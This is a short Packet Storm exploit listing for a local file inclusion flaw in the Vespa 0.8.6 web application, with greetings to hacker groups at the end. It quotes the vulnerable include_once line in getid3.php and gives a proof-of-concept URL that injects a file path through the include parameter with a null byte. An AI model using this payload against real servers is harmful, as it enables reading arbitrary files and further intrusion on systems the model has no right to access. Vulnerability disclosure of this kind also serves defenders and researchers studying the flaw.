Vespa 0.8.6 Local File Inclusion

2012-02-06T00:00:00
ID PACKETSTORM:109476
Type packetstorm
Reporter T0xic
Modified 2012-02-06T00:00:00

Description

                                        
                                            `# Exploit Title: [vespa 0.8.6 Local File Inclusion]  
# Date: [05/02/2012]  
# Author: [T0x!c]  
# Software Link: [http://vespa.willinger.cc/]  
# Version: [vespa 0.8.6]  
# Tested on: [Windows XP]  
:::::::::::::::::::::::::  
=================Exploit=================  
  
-=[ vuln c0de ]=-  
/vespa/getid3/getid3.php  
  
363 // include module  
364 include_once(GETID3_INCLUDEPATH.$determined_format['include']);  
  
----exploit----  
  
POC : http://[ Address ]/[ Path ]/getid3/getid3.php?include=[LFI]%00  
  
================================greatz================================================  
Greatz to :   
* KedAns-Dz * Caddy-Dz * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * Kalashinkov   
and ALL Akgerian Hackers  
EnJoY o_O  
  
`